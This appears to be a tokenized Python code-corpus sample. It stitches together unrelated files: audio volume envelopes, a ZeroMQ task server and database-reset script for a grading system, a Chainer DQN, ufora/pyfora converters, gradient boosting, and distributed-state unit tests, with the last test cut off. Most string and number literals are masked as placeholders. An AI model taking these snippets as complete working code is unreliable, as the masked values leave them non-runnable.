INDENT , <EOL> DEDENT = tokenize . DEDENT , <EOL> NEWLINE = tokenize . NEWLINE , <EOL> COMMENT = tokenize . COMMENT , <EOL> NL = tokenize . NL ) : <EOL> if type == NEWLINE : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> elif type == INDENT : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> self . level += <NUM_LIT:1> <EOL> elif type == DEDENT : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> self . level -= <NUM_LIT:1> <EOL> elif type == COMMENT : <EOL> if self . find_stmt : <EOL> self . stats . append ( ( sline , - <NUM_LIT:1> ) ) <EOL> elif type == NL : <EOL> pass <EOL> elif self . find_stmt : <EOL> self . find_stmt = <NUM_LIT:0> <EOL> if line : <EOL> self . stats . append ( ( sline , self . level ) ) <EOL> def getlspace ( line ) : <EOL> i , n = <NUM_LIT:0> , len ( line ) <EOL> while i < n and line [ i ] == "<STR_LIT:U+0020>" : <EOL> i += <NUM_LIT:1> <EOL> return i <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from collections import namedtuple <EOL> import numpy as np <EOL> class VolumeBreakpoint ( <EOL> namedtuple ( '<STR_LIT>' , [ '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> def __new__ ( cls , time , volume , fade_type = "<STR_LIT>" ) : <EOL> return super ( VolumeBreakpoint , cls ) . __new__ ( <EOL> cls , time , volume , fade_type ) <EOL> class VolumeBreakpoints ( object ) : <EOL> def __init__ ( self , volume_breakpoints ) : <EOL> self . breakpoints = volume_breakpoints <EOL> def add_breakpoint ( self , bp ) : <EOL> self . breakpoints . append ( bp ) <EOL> def add_breakpoints ( self , bps ) : <EOL> self . breakpoints . extend ( bps ) <EOL> def to_array ( self , samplerate ) : <EOL> sorted_bps = sorted ( self . breakpoints , key = lambda x : x . time ) <EOL> arr = np . ones ( int ( sorted_bps [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] * samplerate ) ) <EOL> for i , bp in enumerate ( sorted_bps [ : - <NUM_LIT:1> ] ) : <EOL> t = int ( bp . time * samplerate ) <EOL> v = bp . volume <EOL> next_t = int ( sorted_bps [ i + <NUM_LIT:1> ] . time * samplerate ) <EOL> next_v = sorted_bps [ i + <NUM_LIT:1> ] . volume <EOL> if bp . fade_type == "<STR_LIT>" and v != next_v : <EOL> if v < next_v : <EOL> arr [ t : next_t ] = np . logspace ( <EOL> <NUM_LIT:8> , <NUM_LIT:1> , num = next_t - t , base = <NUM_LIT> ) * ( next_v - v ) / <NUM_LIT> + v <EOL> else : <EOL> arr [ t : next_t ] = np . logspace ( <EOL> <NUM_LIT:1> , <NUM_LIT:8> , num = next_t - t , base = <NUM_LIT> ) * ( v - next_v ) / <NUM_LIT> + next_v <EOL> else : <EOL> arr [ t : next_t ] = np . linspace ( v , next_v , num = next_t - t ) <EOL> return arr </s>
<s> import deepdish as dd <EOL> import numpy as np <EOL> def compute ( indices , x ) : <EOL> return indices , <NUM_LIT:2> * x <EOL> if dd . parallel . main ( __name__ ) : <EOL> x = np . arange ( <NUM_LIT:100> ) * <NUM_LIT:10> <EOL> index_batches = np . array_split ( np . arange ( len ( x ) ) , <NUM_LIT:10> ) <EOL> args = ( ( indices , x [ indices ] ) for indices in index_batches ) <EOL> y = np . zeros_like ( x ) <EOL> for indices , batch_y in dd . parallel . starmap_unordered ( compute , args ) : <EOL> print ( '<STR_LIT>' , indices ) <EOL> y [ indices ] = batch_y <EOL> print ( y ) </s>
<s> from mongoengine import * <EOL> class Archive ( Document ) : <EOL> requester = StringField ( required = True ) <EOL> file_location = StringField ( ) <EOL> error_string = StringField ( ) <EOL> expires = DateTimeField ( ) <EOL> archive_type = StringField ( choices = [ "<STR_LIT>" , "<STR_LIT>" ] , required = True ) <EOL> meta = { <EOL> "<STR_LIT>" : False <EOL> } </s>
<s> from galah . base . config import load_config <EOL> config = load_config ( "<STR_LIT>" ) <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> import mongoengine <EOL> mongoengine . connect ( config [ "<STR_LIT>" ] ) <EOL> from Queue import Queue <EOL> from collections import namedtuple <EOL> Task = namedtuple ( "<STR_LIT>" , ( "<STR_LIT:name>" , "<STR_LIT:args>" , "<STR_LIT>" ) ) <EOL> task_queue = Queue ( ) <EOL> from tasks import task_list <EOL> import zmq <EOL> context = zmq . Context ( ) <EOL> socket = context . socket ( zmq . REP ) <EOL> socket . bind ( config [ "<STR_LIT>" ] ) <EOL> import sys <EOL> def consumer ( ) : <EOL> from threading import current_thread <EOL> logger = logging . getLogger ( "<STR_LIT>" + current_thread ( ) . name ) <EOL> while True : <EOL> task = task_queue . get ( ) <EOL> try : <EOL> task_list [ task . name ] ( * task . args , ** task . kwargs ) <EOL> except Exception as e : <EOL> if type ( e ) is TypeError and str ( e ) . startswith ( "<STR_LIT>" % task . name ) : <EOL> logger . error ( "<STR_LIT>" , str ( task ) ) <EOL> else : <EOL> logger . warning ( <EOL> "<STR_LIT>" , task . name , <EOL> exc_info = sys . exc_info ( ) <EOL> ) <EOL> def to_task ( request ) : <EOL> is_valid = ( <EOL> type ( request ) is dict and <EOL> all ( k in request . keys ( ) for k in ( "<STR_LIT>" , "<STR_LIT:args>" , "<STR_LIT>" ) ) and <EOL> isinstance ( request [ "<STR_LIT>" ] , basestring ) and <EOL> type ( request [ "<STR_LIT:args>" ] ) is list and <EOL> type ( request [ "<STR_LIT>" ] ) is dict <EOL> ) <EOL> if not is_valid : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> return Task ( <EOL> name = request [ "<STR_LIT>" ] , <EOL> args = request [ "<STR_LIT:args>" ] , <EOL> kwargs = request [ "<STR_LIT>" ] <EOL> ) <EOL> from threading import Thread <EOL> consumer_thread = Thread ( name = "<STR_LIT>" , target = consumer ) <EOL> consumer_thread . daemon = True <EOL> consumer_thread . 
start ( ) <EOL> def main ( ) : <EOL> while True : <EOL> task = socket . recv_json ( ) <EOL> try : <EOL> task = to_task ( task ) <EOL> except RuntimeError as e : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> socket . send_json ( { <EOL> "<STR_LIT:success>" : False , <EOL> "<STR_LIT>" : str ( e ) <EOL> } ) <EOL> continue <EOL> logger . info ( "<STR_LIT>" , task . name ) <EOL> if task . name not in task_list . keys ( ) : <EOL> logger . error ( "<STR_LIT>" , task . name ) <EOL> socket . send_json ( { <EOL> "<STR_LIT:success>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" % task . name <EOL> } ) <EOL> continue <EOL> task_queue . put ( task ) <EOL> socket . send_json ( { "<STR_LIT:success>" : True } ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> def main ( ) : <EOL> delete_submissions = raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> delete_assignments = delete_submissions and raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> delete_users = delete_assignments and raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> delete_classes = delete_users and raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> import mongoengine <EOL> mongoengine . connect ( "<STR_LIT>" ) <EOL> from galah . base . config import load_config <EOL> config = load_config ( "<STR_LIT>" ) <EOL> if delete_submissions : <EOL> import subprocess <EOL> print "<STR_LIT>" <EOL> subprocess . check_call ( [ "<STR_LIT>" , "<STR_LIT>" , config [ "<STR_LIT>" ] ] ) <EOL> import galah . db . models as models <EOL> print "<STR_LIT>" <EOL> models . Submission . objects ( ) . delete ( ) <EOL> if delete_users : <EOL> print "<STR_LIT>" <EOL> models . User . objects ( account_type__ne = "<STR_LIT>" ) . delete ( ) <EOL> if delete_assignments : <EOL> print "<STR_LIT>" <EOL> models . Assignment . objects ( ) . delete ( ) <EOL> if delete_classes : <EOL> print "<STR_LIT>" <EOL> models . Class . objects ( ) . delete ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import copy <EOL> import numpy as np <EOL> from chainer import cuda , FunctionSet , Variable , optimizers <EOL> import chainer . functions as F <EOL> class QNet : <EOL> gamma = <NUM_LIT> <EOL> initial_exploration = <NUM_LIT:10> ** <NUM_LIT:3> <EOL> replay_size = <NUM_LIT:32> <EOL> target_model_update_freq = <NUM_LIT:10> ** <NUM_LIT:4> <EOL> data_size = <NUM_LIT:10> ** <NUM_LIT:5> <EOL> hist_size = <NUM_LIT:1> <EOL> def __init__ ( self , use_gpu , enable_controller , dim ) : <EOL> self . use_gpu = use_gpu <EOL> self . num_of_actions = len ( enable_controller ) <EOL> self . enable_controller = enable_controller <EOL> self . dim = dim <EOL> print ( "<STR_LIT>" ) <EOL> hidden_dim = <NUM_LIT> <EOL> self . model = FunctionSet ( <EOL> l4 = F . Linear ( self . dim * self . hist_size , hidden_dim , wscale = np . sqrt ( <NUM_LIT:2> ) ) , <EOL> q_value = F . Linear ( hidden_dim , self . num_of_actions , <EOL> initialW = np . zeros ( ( self . num_of_actions , hidden_dim ) , <EOL> dtype = np . float32 ) ) <EOL> ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> self . model . to_gpu ( ) <EOL> self . model_target = copy . deepcopy ( self . model ) <EOL> self . optimizer = optimizers . RMSpropGraves ( lr = <NUM_LIT> , alpha = <NUM_LIT> , momentum = <NUM_LIT> , eps = <NUM_LIT> ) <EOL> self . optimizer . setup ( self . model . collect_parameters ( ) ) <EOL> self . d = [ np . zeros ( ( self . data_size , self . hist_size , self . dim ) , dtype = np . uint8 ) , <EOL> np . zeros ( self . data_size , dtype = np . uint8 ) , <EOL> np . zeros ( ( self . data_size , <NUM_LIT:1> ) , dtype = np . int8 ) , <EOL> np . zeros ( ( self . data_size , self . hist_size , self . dim ) , dtype = np . uint8 ) , <EOL> np . zeros ( ( self . data_size , <NUM_LIT:1> ) , dtype = np . bool ) ] <EOL> def forward ( self , state , action , reward , state_dash , episode_end ) : <EOL> num_of_batch = state . 
shape [ <NUM_LIT:0> ] <EOL> s = Variable ( state ) <EOL> s_dash = Variable ( state_dash ) <EOL> q = self . q_func ( s ) <EOL> tmp = self . q_func_target ( s_dash ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> tmp = list ( map ( np . max , tmp . data . get ( ) ) ) <EOL> else : <EOL> tmp = list ( map ( np . max , tmp . data ) ) <EOL> max_q_dash = np . asanyarray ( tmp , dtype = np . float32 ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> target = np . asanyarray ( q . data . get ( ) , dtype = np . float32 ) <EOL> else : <EOL> target = np . array ( q . data , dtype = np . float32 ) <EOL> for i in xrange ( num_of_batch ) : <EOL> if not episode_end [ i ] [ <NUM_LIT:0> ] : <EOL> tmp_ = reward [ i ] + self . gamma * max_q_dash [ i ] <EOL> else : <EOL> tmp_ = reward [ i ] <EOL> action_index = self . action_to_index ( action [ i ] ) <EOL> target [ i , action_index ] = tmp_ <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> target = cuda . to_gpu ( target ) <EOL> td = Variable ( target ) - q <EOL> td_tmp = td . data + <NUM_LIT> * ( abs ( td . data ) <= <NUM_LIT:1> ) <EOL> td_clip = td * ( abs ( td . data ) <= <NUM_LIT:1> ) + td / abs ( td_tmp ) * ( abs ( td . data ) > <NUM_LIT:1> ) <EOL> zero_val = np . zeros ( ( self . replay_size , self . num_of_actions ) , dtype = np . float32 ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> zero_val = cuda . to_gpu ( zero_val ) <EOL> zero_val = Variable ( zero_val ) <EOL> loss = F . mean_squared_error ( td_clip , zero_val ) <EOL> return loss , q <EOL> def stock_experience ( self , time , <EOL> state , action , reward , state_dash , <EOL> episode_end_flag ) : <EOL> data_index = time % self . data_size <EOL> if episode_end_flag is True : <EOL> self . d [ <NUM_LIT:0> ] [ data_index ] = state <EOL> self . d [ <NUM_LIT:1> ] [ data_index ] = action <EOL> self . d [ <NUM_LIT:2> ] [ data_index ] = reward <EOL> else : <EOL> self . d [ <NUM_LIT:0> ] [ data_index ] = state <EOL> self . d [ <NUM_LIT:1> ] [ data_index ] = action <EOL> self . 
d [ <NUM_LIT:2> ] [ data_index ] = reward <EOL> self . d [ <NUM_LIT:3> ] [ data_index ] = state_dash <EOL> self . d [ <NUM_LIT:4> ] [ data_index ] = episode_end_flag <EOL> def experience_replay ( self , time ) : <EOL> if self . initial_exploration < time : <EOL> if time < self . data_size : <EOL> replay_index = np . random . randint ( <NUM_LIT:0> , time , ( self . replay_size , <NUM_LIT:1> ) ) <EOL> else : <EOL> replay_index = np . random . randint ( <NUM_LIT:0> , self . data_size , ( self . replay_size , <NUM_LIT:1> ) ) <EOL> s_replay = np . ndarray ( shape = ( self . replay_size , self . hist_size , self . dim ) , dtype = np . float32 ) <EOL> a_replay = np . ndarray ( shape = ( self . replay_size , <NUM_LIT:1> ) , dtype = np . uint8 ) <EOL> r_replay = np . ndarray ( shape = ( self . replay_size , <NUM_LIT:1> ) , dtype = np . float32 ) <EOL> s_dash_replay = np . ndarray ( shape = ( self . replay_size , self . hist_size , self . dim ) , dtype = np . float32 ) <EOL> episode_end_replay = np . ndarray ( shape = ( self . replay_size , <NUM_LIT:1> ) , dtype = np . bool ) <EOL> for i in xrange ( self . replay_size ) : <EOL> s_replay [ i ] = np . asarray ( self . d [ <NUM_LIT:0> ] [ replay_index [ i ] ] , dtype = np . float32 ) <EOL> a_replay [ i ] = self . d [ <NUM_LIT:1> ] [ replay_index [ i ] ] <EOL> r_replay [ i ] = self . d [ <NUM_LIT:2> ] [ replay_index [ i ] ] <EOL> s_dash_replay [ i ] = np . array ( self . d [ <NUM_LIT:3> ] [ replay_index [ i ] ] , dtype = np . float32 ) <EOL> episode_end_replay [ i ] = self . d [ <NUM_LIT:4> ] [ replay_index [ i ] ] <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> s_replay = cuda . to_gpu ( s_replay ) <EOL> s_dash_replay = cuda . to_gpu ( s_dash_replay ) <EOL> self . optimizer . zero_grads ( ) <EOL> loss , _ = self . forward ( s_replay , a_replay , r_replay , s_dash_replay , episode_end_replay ) <EOL> loss . backward ( ) <EOL> self . optimizer . update ( ) <EOL> def q_func ( self , state ) : <EOL> h4 = F . relu ( self . model . 
l4 ( state ) ) <EOL> q = self . model . q_value ( h4 / <NUM_LIT> ) <EOL> return q <EOL> def q_func_target ( self , state ) : <EOL> h4 = F . relu ( self . model_target . l4 ( state / <NUM_LIT> ) ) <EOL> q = self . model_target . q_value ( h4 ) <EOL> return q <EOL> def e_greedy ( self , state , epsilon ) : <EOL> s = Variable ( state ) <EOL> q = self . q_func ( s ) <EOL> q = q . data <EOL> if np . random . rand ( ) < epsilon : <EOL> index_action = np . random . randint ( <NUM_LIT:0> , self . num_of_actions ) <EOL> print ( "<STR_LIT>" ) , <EOL> else : <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> index_action = np . argmax ( q . get ( ) ) <EOL> else : <EOL> index_action = np . argmax ( q ) <EOL> print ( "<STR_LIT>" ) , <EOL> return self . index_to_action ( index_action ) , q <EOL> def target_model_update ( self ) : <EOL> self . model_target = copy . deepcopy ( self . model ) <EOL> def index_to_action ( self , index_of_action ) : <EOL> return self . enable_controller [ index_of_action ] <EOL> def action_to_index ( self , action ) : <EOL> return self . enable_controller . index ( action ) </s>
import logging
import pyfora.Exceptions as Exceptions
import pyfora.TypeDescription as TypeDescription


class ObjectConverter(object):
    """Ships locally registered python objects to a remote pyfora converter
    created through a web-object factory.
    """

    def __init__(self, webObjectFactory, purePythonMDSAsJson):
        self.webObjectFactory = webObjectFactory
        self.remoteConverter = webObjectFactory.PyforaObjectConverter()

        def onSuccess(x):
            pass

        def onFailure(x):
            logging.error("<STR_LIT>", x)

        self.remoteConverter.initialize(
            {'<STR_LIT>': purePythonMDSAsJson},
            {'<STR_LIT>': onSuccess, '<STR_LIT>': onFailure}
            )

    def convert(self, objectId, objectRegistry, callback):
        """Serialize the dependency graph of `objectId` and submit it to the
        remote converter; `callback` receives either the object id on success
        or a PythonToForaConversionError on failure.
        """
        dependencyGraph = objectRegistry.computeDependencyGraph(objectId)

        # Serialize every definition reachable from objectId.
        definitions = {}
        for dependentId in dependencyGraph.iterkeys():
            definitions[dependentId] = TypeDescription.serialize(
                objectRegistry.getDefinition(dependentId)
                )

        def onConverted(message):
            if '<STR_LIT>' in message:
                callback(
                    Exceptions.PythonToForaConversionError(
                        str(message['<STR_LIT:message>']), message['<STR_LIT>']
                        )
                    )
            else:
                callback(objectId)

        def onFailure(err):
            callback(Exceptions.PythonToForaConversionError(err))

        self.remoteConverter.convert(
            {
                '<STR_LIT>': objectId,
                '<STR_LIT>': definitions
            },
            {
                '<STR_LIT>': onConverted,
                '<STR_LIT>': onFailure
            })
<s> import losses <EOL> import Base <EOL> import RegressionModel <EOL> class IterativeFitter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , predictions ) : <EOL> self . model = model <EOL> self . predictions = predictions <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> pseudoResiduals , newPredictions = self . model . pseudoResidualsAndPredictions ( self . predictions ) <EOL> newModel = self . model . boost ( newPredictions , pseudoResiduals ) <EOL> return IterativeFitter ( newModel , newPredictions ) <EOL> def predictionsAndPseudoresiduals ( self ) : <EOL> return self . model . pseudoResidualsAndPredictions ( <EOL> self . predictions <EOL> ) <EOL> class GradientBoostedRegressorBuilder : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maxDepth = <NUM_LIT:3> , nBoosts = <NUM_LIT:100> , learningRate = <NUM_LIT:1.0> , <EOL> minSamplesSplit = <NUM_LIT:2> , numBuckets = <NUM_LIT> , loss = "<STR_LIT>" ) : <EOL> if loss == '<STR_LIT>' : <EOL> loss = losses . L2_loss ( ) <EOL> elif loss == '<STR_LIT>' : <EOL> loss = losses . Absoluteloss ( ) <EOL> else : <EOL> assert False , "<STR_LIT>" + str ( loss ) <EOL> treeBuilderArgs = Base . TreeBuilderArgs ( <EOL> minSamplesSplit , maxDepth , numBuckets <EOL> ) <EOL> self . loss = loss <EOL> self . nBoostingIterations = nBoosts <EOL> self . learningRate = learningRate <EOL> self . treeBuilderArgs = treeBuilderArgs <EOL> def iterativeFitter ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> yAsSeries = y . iloc [ : , <NUM_LIT:0> ] <EOL> model = self . _getInitialModel ( X , yAsSeries ) <EOL> return IterativeFitter ( model , None ) <EOL> def _getInitialModel ( self , X , yAsSeries ) : <EOL> return RegressionModel . RegressionModel . getInitialModel ( <EOL> X , yAsSeries , self . loss , self . learningRate , self . treeBuilderArgs <EOL> ) <EOL> def fit ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> iterativeFitter = self . iterativeFitter ( X , y ) <EOL> boostingIx = <NUM_LIT:0> <EOL> while boostingIx < self . 
nBoostingIterations : <EOL> iterativeFitter = iterativeFitter . next ( ) <EOL> boostingIx = boostingIx + <NUM_LIT:1> <EOL> return iterativeFitter . model </s>
<s> def d_func ( x ) : <EOL> return x + <NUM_LIT:1> </s>
import unittest
import logging
import random
import ufora.util.ManagedThread as ManagedThread
import uuid
import ufora.config.Setup as Setup
import ufora.native.Json as NativeJson
import ufora.test.ClusterSimulation as ClusterSimulation
import ufora.test.CumulusSimulationUtils as CumulusSimulationUtils
import ufora.distributed.SharedState.Connections.ViewFactory as ViewFactory
import ufora.distributed.SharedState.SharedState as SharedState
import ufora.native.CallbackScheduler as CallbackScheduler

# Shared scheduler for every view created by these tests.
callbackScheduler = CallbackScheduler.singletonForTesting()


class SharedStateRelayTests(unittest.TestCase):
    """Stress test: many threads transactionally writing random keys through
    SharedState, via either a TCP view factory or the simulator's relay."""

    @classmethod
    def setUpClass(cls):
        # One cluster simulator is shared by every test in the class.
        cls.simulator = ClusterSimulation.Simulator.createGlobalSimulator()
        cls.simulator.startService()
        cls.simulator.verifySharedStateRunning()
        cls.desirePublisher = cls.simulator.desirePublisher

    def stressMultipleSharedStateReadWrites(self, useTcpFactory=False, keysToWrite=<NUM_LIT:20>, threadcount=<NUM_LIT:10>):
        """Spawn `threadcount` writer threads, each performing `subPasses`
        rounds of `keysToWrite` transactional writes to random keys, and
        assert that every thread completed all of its passes."""
        keyspaceSize = keysToWrite * <NUM_LIT:5>
        subPasses = <NUM_LIT:10>
        if useTcpFactory:
            viewFactory = ViewFactory.ViewFactory.TcpViewFactory(callbackScheduler, address="<STR_LIT:localhost>")
        else:
            viewFactory = self.simulator.getViewFactory()
        # worked[threadIx] flips to True only if that thread finishes cleanly.
        worked = {}
        for ix in range(threadcount):
            worked[ix] = False

        def test(threadIx):
            for subPassIx in range(subPasses):
                logging.info("<STR_LIT>", threadIx, subPassIx)
                testKeyspace = SharedState.Keyspace("<STR_LIT>", NativeJson.Json("<STR_LIT>"), <NUM_LIT:1>)
                view = viewFactory.createView()
                rng = SharedState.KeyRange(testKeyspace, <NUM_LIT:0>, None, None, True, False)
                view.subscribe(rng)
                for ix in range(keysToWrite):
                    with SharedState.Transaction(view):
                        # NOTE(review): `ix` is rebound here, shadowing the
                        # loop counter -- each write targets a *random* slot
                        # in the keyspace rather than slot `ix`.
                        ix = random.randint(<NUM_LIT:0>, keyspaceSize)
                        key = SharedState.Key(testKeyspace, (NativeJson.Json("<STR_LIT>" % ix),))
                        value = uuid.uuid4().hex
                        view[key] = NativeJson.Json(value)
            # Only reached if every pass completed without raising.
            worked[threadIx] = True

        threads = [ManagedThread.ManagedThread(target=test, args=(ix,)) for ix in range(threadcount)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        expectedDict = {}
        for ix in range(threadcount):
            expectedDict[ix] = True
        self.assertEqual(expectedDict, worked)

    def testWithTcp(self):
        self.stressMultipleSharedStateReadWrites(True, <NUM_LIT:200>)

    def testWithRelay(self):
        self.stressMultipleSharedStateReadWrites(False, <NUM_LIT:200>)

    @classmethod
    def tearDownClass(cls):
        cls.simulator.stopService()


if __name__ == '<STR_LIT:__main__>':
    import ufora.config.Mainline as Mainline
    import ufora.config.LoginConfiguration as LoginConfiguration
    Mainline.UnitTestMainline(
        loginConfiguration=LoginConfiguration.LoginConfiguration("<STR_LIT>", "<STR_LIT>", True, {})
        )
import unittest
import logging
import ufora.BackendGateway.ComputedGraph.ComputedGraph as ComputedGraph
import ufora.BackendGateway.ComputedValue.ComputedValueGateway as ComputedValueGateway
import ufora.BackendGateway.ComputedValue.ComputedValueTestCases as ComputedValueTestCases
import ufora.cumulus.distributed.CumulusGatewayInProcess as CumulusGatewayInProcess
import ufora.native.CallbackScheduler as CallbackScheduler

callbackScheduler = CallbackScheduler.singletonForTesting()
callbackSchedulerFactory = callbackScheduler.getFactory()


class TestComputedValue(unittest.TestCase, ComputedValueTestCases.ComputedValueTestCases):
    """Runs the shared ComputedValue test cases against an in-process
    Cumulus gateway (test bodies come from the mixin)."""

    def setUp(self):
        # Cleared first so a failed setup leaves well-defined attributes.
        self.graph = None
        self.computedValueGateway = None
        setUpComputedValueTest(self)

    def tearDown(self):
        tearDownComputedValueTest(self)


def setUpComputedValueTest(tester):
    # Enter a ComputedGraph context, then stand up a computed-value gateway
    # backed by an in-process Cumulus gateway.
    tester.graph = ComputedGraph.ComputedGraph()
    tester.graph.__enter__()

    def gatewayFactory(callbackScheduler, vdm):
        return CumulusGatewayInProcess.InProcessGateway(callbackSchedulerFactory, callbackScheduler, vdm)

    tester.computedValueGateway = ComputedValueGateway.CumulusComputedValueGateway(
        callbackSchedulerFactory,
        callbackScheduler,
        gatewayFactory
        )
    tester.computedValueGateway.__enter__()


def tearDownComputedValueTest(tester):
    logging.info("<STR_LIT>")
    # Exit contexts in reverse order of setup, fully tear the gateway down,
    # then drop references so every test starts from a clean slate.
    tester.computedValueGateway.__exit__(None, None, None)
    tester.graph.__exit__(None, None, None)
    tester.computedValueGateway.teardown()
    tester.computedValueGateway = None
    tester.graph = None
    logging.info("<STR_LIT>")
import unittest
import logging
import ufora.native.FORA as ForaNative
import ufora.FORA.python.ExecutionContext as ExecutionContext
import ufora.FORA.python.FORA as FORA
import ufora.native.CallbackScheduler as CallbackScheduler

# Shared scheduler for every execution context created in this module.
callbackScheduler = CallbackScheduler.singletonForTesting()
callbackSchedulerFactory = callbackScheduler.getFactory()

# A code-definition point with no external source attribution.
emptyCodeDefinitionPoint = ForaNative.CodeDefinitionPoint.ExternalFromStringList([])


class NotInterruptedException(Exception):
    """Raised when a computation expected to be interrupted ran to completion."""
    def __init__(self, context):
        self.context = context

    def __repr__(self):
        return repr(self.context)


class NotAResultException(Exception):
    """Raised when a finished computation did not produce a normal result."""
    def __init__(self, x):
        self.val = x

    def __repr__(self):
        return repr(self.val)


class CouldntFinishException(Exception):
    """Raised when resuming a paused computation failed to run it to completion."""
    def __init__(self, x):
        self.val = x

    def __repr__(self):
        return repr(self.val)


def finishPausedComputation(pausedComputation):
    """Resume `pausedComputation` in a fresh context and return its value:
    the normal result if it succeeded, or the exception value if it threw."""
    vdm = ForaNative.VectorDataManager(callbackScheduler, <NUM_LIT:50> * <NUM_LIT> * <NUM_LIT>)
    context2 = ExecutionContext.ExecutionContext(
        dataManager=vdm,
        allowInterpreterTracing=False
        )
    context2.resumePausedComputation(pausedComputation)
    context2.resume()
    if (not context2.isFinished()):
        raise CouldntFinishException(pausedComputation)
    finishedResult = context2.getFinishedResult()
    if (finishedResult.isResult()):
        return finishedResult.asResult.result
    elif (finishedResult.isException()):
        return finishedResult.asException.exception
    else:
        raise Exception("<STR_LIT>")


def callAndGetResult(funImplVal):
    """Evaluate `funImplVal()` to completion; raise NotAResultException unless
    it produced a normal result."""
    vdm = ForaNative.VectorDataManager(callbackScheduler, <NUM_LIT:50> * <NUM_LIT> * <NUM_LIT>)
    context = ExecutionContext.ExecutionContext(
        dataManager=vdm,
        allowInterpreterTracing=False
        )
    context.evaluate(funImplVal, ForaNative.symbol_Call)
    finishedResult = context.getFinishedResult()
    if (not finishedResult.isResult()):
        raise NotAResultException(finishedResult)
    return finishedResult.asResult.result


def callAndExtractPausedCompuationAfterSteps(funToCall, steps):
    """Start `funToCall()`, interrupt after `steps` cycles, and return the
    extracted paused computation.  Raises NotInterruptedException if the call
    finished before the interrupt fired."""
    vdm = ForaNative.VectorDataManager(callbackScheduler, <NUM_LIT:50> * <NUM_LIT> * <NUM_LIT>)
    context = ExecutionContext.ExecutionContext(
        dataManager=vdm,
        allowInterpreterTracing=False
        )
    context.interruptAfterCycleCount(steps)
    context.evaluate(
        funToCall,
        ForaNative.symbol_Call
        )
    if (not context.isInterrupted()):
        raise NotInterruptedException(context)
    computation = context.extractPausedComputation()
    context.teardown()
    return computation


class ControlFlowGraphSplitterTest(unittest.TestCase):
    """Tests splitting of FORA control-flow graphs and paused computations."""

    def parseStringToFunction(self, expr):
        # Parse FORA source into a function predicate with no code origin.
        expression = ForaNative.parseStringToExpression(expr, emptyCodeDefinitionPoint, "<STR_LIT>")
        return expression.extractRootLevelCreateFunctionPredicate()

    def test_cfgSplitting_1(self):
        cfg1 = self.parseStringToFunction("<STR_LIT>").toCFG(<NUM_LIT:1>)
        steps = ForaNative.extractApplyStepsFromControlFlowGraph(cfg1, "<STR_LIT>")
        self.assertEqual(len(steps), <NUM_LIT:4>)
        splits = ForaNative.splitControlFlowGraph(cfg1, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_2(self):
        cfg1 = self.parseStringToFunction("<STR_LIT>").toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg1, None)
        self.assertTrue(splits is None)

    def test_cfgSplitting_3(self):
        cfg1 = self.parseStringToFunction("<STR_LIT>").toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg1, None)
        self.assertTrue(splits is None)

    def test_cfgSplitting_4(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        # `steps` is only extracted for its side-effect-free sanity value here.
        steps = ForaNative.extractApplyStepsFromControlFlowGraph(cfg, None)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_5(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        steps = ForaNative.extractApplyStepsFromControlFlowGraph(cfg, None)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_6(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_7(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_8(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_9(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_10(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
